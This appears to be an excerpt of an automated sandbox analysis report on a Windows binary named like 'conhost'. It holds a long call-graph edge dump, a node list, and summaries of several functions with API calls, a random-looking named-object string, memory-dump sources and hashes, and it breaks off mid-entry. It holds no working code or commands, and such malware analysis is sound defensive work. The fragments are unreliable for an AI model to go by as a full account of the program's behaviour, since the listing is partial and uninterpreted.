2335->2336 2337 14000149a 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014a9 2338->2339 2340 140001394 2 API calls 2339->2340 2341 1400014b8 2340->2341 2342 140001394 2 API calls 2341->2342 2343 1400014c7 2342->2343 2344 140001394 2 API calls 2343->2344 2345 1400014d6 2344->2345 2346 1400014e5 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 1400014ef 2348->2349 2350 1400014f4 2349->2350 2351 140001394 2 API calls 2349->2351 2352 140001394 2 API calls 2350->2352 2351->2350 2353 1400014fe 2352->2353 2354 140001503 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 14000150d 2356->2357 2358 140001394 2 API calls 2357->2358 2359 140001512 2358->2359 2360 140001394 2 API calls 2359->2360 2361 140001521 2360->2361 2362 140001394 2 API calls 2361->2362 2363 140001530 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000153f 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000154e 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000155d 2368->2369 2370 140001394 2 API calls 2369->2370 2371 14000156c 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000157b 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000158a 2374->2375 2376 140001394 2 API calls 2375->2376 2377 140001599 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015a8 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015b7 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015c6 2382->2383 2384 140001394 2 API calls 2383->2384 2385 1400015d5 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015e4 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015f3 2388->2389 2389->2187 2391 140001394 2 API calls 2390->2391 2392 14000147c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000148b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000149a 2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014a9 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400014b8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400014c7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400014d6 2403->2404 2405 1400014e5 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 1400014ef 2407->2408 2409 1400014f4 2408->2409 2410 140001394 2 API calls 2408->2410 2411 140001394 2 API calls 2409->2411 2410->2409 2412 1400014fe 2411->2412 2413 140001503 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 14000150d 2415->2416 2417 140001394 2 API calls 2416->2417 2418 140001512 2417->2418 2419 140001394 2 API calls 2418->2419 2420 140001521 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001530 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000153f 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000154e 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000155d 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000156c 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000157b 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000158a 2433->2434 2435 140001394 2 API calls 2434->2435 2436 140001599 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015a8 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015b7 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015c6 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015d5 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015e4 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015f3 2447->2448 2448->2223 2449 140001530 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000153f 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000154e 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000155d 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000156c 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000157b 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000158a 2460->2461 2462 140001394 2 API calls 2461->2462 2463 140001599 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015a8 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015b7 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015c6 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015d5 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015e4 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015f3 2474->2475 2475->2213 2475->2214 2477 140001394 2 API calls 2476->2477 2478 1400014b8 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400014c7 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014d6 2481->2482 2483 1400014e5 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 1400014ef 2485->2486 2487 1400014f4 2486->2487 2488 140001394 2 API calls 2486->2488 2489 140001394 2 API calls 2487->2489 2488->2487 2490 1400014fe 2489->2490 2491 140001503 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 14000150d 2493->2494 2495 140001394 2 API calls 2494->2495 2496 140001512 2495->2496 2497 140001394 2 API calls 2496->2497 2498 140001521 2497->2498 2499 140001394 2 API calls 2498->2499 2500 140001530 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000153f 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000154e 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000155d 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000156c 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000157b 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000158a 2511->2512 2513 140001394 2 API calls 2512->2513 2514 140001599 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015a8 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015b7 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015c6 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015d5 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015e4 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015f3 2525->2526 2526->2218 2527 140001440 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000144f 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000145e 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000146d 2532->2533 2534 140001394 2 API calls 2533->2534 2535 14000147c 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000148b 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000149a 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014a9 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400014b8 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400014c7 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400014d6 2546->2547 2548 1400014e5 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 1400014ef 2550->2551 2552 1400014f4 2551->2552 2553 140001394 2 API calls 2551->2553 2554 140001394 2 API calls 2552->2554 2553->2552 2555 1400014fe 2554->2555 2556 140001503 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 14000150d 2558->2559 2560 140001394 2 API calls 2559->2560 2561 140001512 2560->2561 2562 140001394 2 API calls 2561->2562 2563 140001521 2562->2563 2564 140001394 2 API calls 2563->2564 2565 140001530 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000153f 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000154e 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000155d 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000156c 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000157b 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000158a 2576->2577 2578 140001394 2 API calls 2577->2578 2579 140001599 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015a8 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015b7 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015c6 2584->2585 2586 140001394 2 API calls 2585->2586 2587 1400015d5 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015e4 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015f3 2590->2591 2591->2218 2591->2226 2593 1400014e5 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014ef 2595->2596 2597 1400014f4 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 1400014fe 2599->2600 2601 140001503 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 14000150d 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001512 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001521 2607->2608 2609 140001394 2 API calls 2608->2609 2610 140001530 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000153f 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000154e 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000155d 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000156c 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000157b 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000158a 2621->2622 2623 140001394 2 API calls 2622->2623 2624 140001599 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015a8 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015b7 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015c6 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015d5 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015e4 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015f3 2635->2636 2636->2235 2638 140001394 2 API calls 2637->2638 2639 14000158a 2638->2639 2640 140001394 2 API calls 2639->2640 2641 140001599 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015a8 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015b7 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015c6 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015d5 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015e4 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015f3 2652->2653 2653->2235 2655 140001394 2 API calls 2654->2655 2656 1400015b7 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015c6 2657->2658 2659 140001394 2 API calls 2658->2659 2660 1400015d5 2659->2660 2661 140001394 2 API calls 2660->2661 2662 1400015e4 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400015f3 2663->2664 2664->2235 2666 140001394 2 API calls 2665->2666 2667 140001530 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000153f 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000154e 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000155d 2672->2673 2674 140001394 2 API calls 2673->2674 2675 14000156c 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000157b 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000158a 2678->2679 2680 140001394 2 API calls 2679->2680 2681 140001599 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015a8 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015b7 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015c6 2686->2687 2688 140001394 2 API calls 2687->2688 2689 1400015d5 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015e4 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015f3 2692->2693 2693->2235 2695 140001394 2 API calls 2694->2695 2696 140001431 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001440 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000144f 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000145e 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000146d 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000147c 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000148b 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000149a 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014a9 2711->2712 2713 140001394 2 API calls 2712->2713 2714 1400014b8 2713->2714 2715 140001394 2 API calls 2714->2715 2716 1400014c7 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014d6 2717->2718 2719 1400014e5 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 1400014ef 2721->2722 2723 1400014f4 2722->2723 2724 140001394 2 API calls 2722->2724 2725 140001394 2 API calls 2723->2725 2724->2723 2726 1400014fe 2725->2726 2727 140001503 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 14000150d 2729->2730 2731 140001394 2 API calls 2730->2731 2732 140001512 2731->2732 2733 140001394 2 API calls 2732->2733 2734 140001521 2733->2734 2735 140001394 2 API calls 2734->2735 2736 140001530 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000153f 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000154e 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000155d 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000156c 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000157b 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000158a 2747->2748 2749 140001394 2 API calls 2748->2749 2750 140001599 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015a8 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015b7 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015c6 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015d5 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015e4 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015f3 2761->2762 2762->2235 2764 140001394 2 API calls 2763->2764 2765 140001440 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000144f 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000145e 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000146d 2770->2771 2772 140001394 2 API calls 2771->2772 2773 14000147c 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000148b 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000149a 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014a9 2778->2779 2780 140001394 2 API calls 2779->2780 2781 1400014b8 2780->2781 2782 140001394 2 API calls 2781->2782 2783 1400014c7 2782->2783 2784 140001394 2 API calls 2783->2784 2785 1400014d6 2784->2785 2786 1400014e5 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 1400014ef 2788->2789 2790 1400014f4 2789->2790 2791 140001394 2 API calls 2789->2791 2792 140001394 2 API calls 2790->2792 2791->2790 2793 1400014fe 2792->2793 2794 140001503 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 14000150d 2796->2797 2798 140001394 2 API calls 2797->2798 2799 140001512 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001521 2800->2801 2802 140001394 2 API calls 2801->2802 2803 140001530 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000153f 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000154e 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000155d 2808->2809 2810 140001394 2 API calls 2809->2810 2811 14000156c 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000157b 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000158a 2814->2815 2816 140001394 2 API calls 2815->2816 2817 140001599 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015a8 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015b7 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2235

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00000001400057E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 76 Function_0000000140001BA0 1->76 2 Function_00000001400014E5 72 Function_0000000140001394 2->72 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400014F4 5->72 6 Function_0000000140002500 7 Function_0000000140001800 65 Function_0000000140002290 7->65 8 Function_0000000140001000 9 Function_0000000140001E00 8->9 39 Function_0000000140001750 8->39 80 Function_0000000140001FB0 8->80 87 Function_0000000140001FC0 8->87 10 Function_0000000140002F00 55 Function_0000000140001370 10->55 11 Function_0000000140005801 12 Function_0000000140005901 13 Function_0000000140001503 13->72 14 Function_0000000140001404 14->72 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140005D10 37 Function_0000000140005A50 17->37 18 Function_0000000140003110 19 Function_0000000140001512 19->72 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140001521 22->72 23 Function_0000000140005721 24 Function_0000000140005821 25 Function_0000000140001422 25->72 26 Function_0000000140001530 26->72 27 Function_0000000140005A30 28 Function_0000000140003130 29 Function_0000000140001431 29->72 30 Function_000000014000153F 30->72 31 Function_0000000140001440 31->72 32 Function_0000000140001140 48 Function_0000000140001160 32->48 33->65 34 Function_0000000140005841 35 Function_0000000140001F47 56 Function_0000000140001870 35->56 36 Function_0000000140002050 38 Function_0000000140003150 38->10 38->13 38->22 38->25 38->26 38->29 38->30 38->31 38->37 44 Function_000000014000145E 38->44 46 Function_0000000140002660 38->46 52 Function_000000014000156C 38->52 53 Function_000000014000146D 38->53 38->55 62 Function_000000014000157B 38->62 77 Function_00000001400015A8 38->77 78 Function_00000001400014A9 38->78 86 Function_00000001400016C0 38->86 97 Function_00000001400014D6 38->97 100 Function_00000001400026E0 38->100 40 Function_0000000140001650 41 Function_0000000140005751 42 Function_0000000140003051 43 Function_000000014000155D 43->72 44->72 45 Function_0000000140002460 47 Function_0000000140005A60 47->37 48->38 48->48 48->56 63 Function_0000000140001880 48->63 64 Function_0000000140001F90 48->64 48->86 49 Function_0000000140001760 101 Function_00000001400020E0 49->101 50 Function_0000000140005861 51 Function_0000000140001E65 51->56 52->72 53->72 54 Function_000000014000216F 57 Function_0000000140001A70 57->33 57->76 58 Function_0000000140003070 59 Function_0000000140005870 60 Function_0000000140005771 61 Function_0000000140005971 62->72 63->20 63->33 63->46 63->76 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005791 70 Function_0000000140005891 71 Function_0000000140005991 72->17 72->47 73 Function_0000000140002194 73->56 74 Function_000000014000219E 75 Function_0000000140001FA0 76->33 79 Function_00000001400023B0 76->79 93 Function_00000001400024D0 76->93 77->72 78->72 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400057B1 85 Function_0000000140001AB3 85->33 85->76 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->33 89->76 90 Function_00000001400014C7 90->72 91 Function_00000001400026D0 92 Function_0000000140001FD0 94 Function_00000001400017D0 95 Function_00000001400059D1 96 Function_0000000140001AD4 96->33 96->76 97->72 98 Function_00000001400022E0 99 Function_00000001400017E0 99->101 100->2 100->5 100->13 100->19 100->37 100->43 100->44 100->46 100->55 100->78 100->90

                                                    Executed Functions

                                                    Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 140001394-140001403 call 140005a60 call 140005d10 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                    • Instruction ID: 0a01b27cd887de470f3a79e9e26df08ee21fc81555de9c41fe10c45f52e6a1ec
                                                    • Opcode Fuzzy Hash: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                    • Instruction Fuzzy Hash: CAF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                    Non-executed Functions

                                                    Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a50 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: wcslen$wcscatwcscpywcsncmp
                                                    • String ID: 0$X$\BaseNamedObjects\plfgpcdlixqaywhhdqwutvgp$`
                                                    • API String ID: 597572034-1325053630
                                                    • Opcode ID: 6dbc3eec9034183ef303d02f415f3af6604283597bc37c30aa4f9b18b6c7e930
                                                    • Instruction ID: 8bace8d1d13e29771e4c874122eba6c2f333ff3c4830102eec7aa4bd748b2165
                                                    • Opcode Fuzzy Hash: 6dbc3eec9034183ef303d02f415f3af6604283597bc37c30aa4f9b18b6c7e930
                                                    • Instruction Fuzzy Hash: 4C1258B2608BC085E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                    Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                    • String ID:
                                                    • API String ID: 2643109117-0
                                                    • Opcode ID: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                    • Instruction ID: 070ab519a2817fabac9d3928640a8dfc31f1868cd1d81c957eb574597805d415
                                                    • Opcode Fuzzy Hash: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                    • Instruction Fuzzy Hash: E05113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300
                                                    Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 433 140001bf3-140001c02 430->433 434 140001be0-140001be7 430->434 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                    • API String ID: 2595394609-2123141913
                                                    • Opcode ID: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                    • Instruction ID: 568161692b5c4f8a705951d6b28697fc04e6310cca5c6e1950853b3621b7b2e0
                                                    • Opcode Fuzzy Hash: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                    • Instruction Fuzzy Hash: 334143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                    Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
